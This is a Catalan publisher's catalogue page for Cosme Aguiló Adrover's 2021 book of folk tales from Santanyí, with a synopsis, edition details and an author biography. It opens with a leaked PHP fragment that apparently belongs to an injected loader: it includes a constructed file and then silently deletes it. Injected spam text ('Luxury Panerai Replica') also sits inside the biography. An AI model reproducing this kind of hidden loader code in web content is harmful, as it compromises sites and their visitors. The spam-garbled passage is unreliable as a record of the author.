");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Rondalles i llegendes de Santanyí
Cercador d'Obres
ORDENAR:
Començar recerca

Rondalles i llegendes de Santanyí

i algunes de fora terme

Aguiló Adrover, Cosme

Prologuista:
Josep A. Grimalt. Epíleg: Gabriel Janer Manila
Col·lecció:
Magatzem Can Toni
Tema:
Narració breu
Pàgines:
216
PVP:
18.00
ISBN:
978-84-18441-32-5
Data d'Edició:
23/06/2021
Cinquanta-una rondalles de la tradició oral, inèdites.
Sinopsi
Hem de convenir que, avui per avui, la possibilitat de recollir textos orals de narradors que els coneguin només per tradició, de boca a boca i de generació en generació, és una tasca prou difícil, si no és utòpica. Tot i la feinada que en aquest sentit va fer Antoni M. Alcover, aquí es demostra que el filó no quedà esgotat del tot, perquè volgué la sort que l’autor d’aquesta obra conegués, cap a finals del darrer terç del segle passat, una persona excepcional de la població des Llombards de la qual va arreplegar nombroses contarelles (rondalles, llegendes, tradicions) que l’animaren a cercar-ne d’altres i a recordar-ne algunes més que li havien estat contades essent encara nin. Pel fet que sovint els transmissors les fan arribar de manera lacònica, han estat reelaborades, vestides de bell nou i plasmades en aquest llibre per tal d’assegurar-ne la persistència en el futur. Tenim la convicció que el llenguatge dialectal i planer amb què han estat escrites ha d’agradar en arribar a les persones que estimen els parlars i les tradicions illenques


Llegir l'Índex en PDF
Llegir la Presentació en PDF


Cosme Aguiló Adrover
(Santanyí, 1950) és un filòleg mallorquí, membre de l'Institut d'Estudis Catalans des del 2006 i publicà articles a la revista Randa i al butlletí de l'Institut Menorquí d'Estudis. El 1991 va rebre el premi Gabriel Alomar de l'OCB i l’Estrella Mostrejada de l’Associació Es Majoral i la revista Dies i Coses de Calonge (1997), és membre corresponent de l’Institut d’Estudis Catalans (2006).
Treballa d’hoteler a un establiment de la seva família. Els inicis de la seva activitat investigadora, vinculats al món de la prehistòria, s’activaren gràcies a una troballa casual de ceràmiques pretalaiòtiques feta el 1966. Cap a l’any 1974 es començà a interessar per la toponímia baleàrica, sobretot del litoral, cosa que el portà a fer reculls sistemàtics de diferents indrets, que ha anat publicant en forma de d’articles (generalment a revistes especialitzades),Luxury Panerai Replica mapes i llibres. Després de superar la prova d’accés per a majors de vint-i-cinc anys (1991), va iniciar els estudis de Filologia Catalana a la Universitat de les Illes Balears i s’hi va llicenciar el 1996. S’hi doctorà el 2007 amb la tesi La toponímia de Santanyí i ses Salines, encara inèdita. Ha publicat una dotzena de llibres i nombrosos articles sobre temes molt diversos: bolets, flora, anècdotes, arquitectura popular, i moltes més coses, entre les quals l’Atles ornitonímic de les illes Balears (2017), en col·laboració amb Antoni Mestre, i el cançoner Aür! Versos de l’antigor (2021), juntament amb Sebastià Adrover.
Ha Edicions Documenta Balear ha publicat De Rebus Populi Mei (2007), Sic Isti Nostri Sunt (2010), La toponímia de la costa d'Artà (2011), Llibres, pròlegs i pregons (2013) i Rondalles i llegendes de Santanyí (2021).
Recomanar
Comentar
Comentaris (0)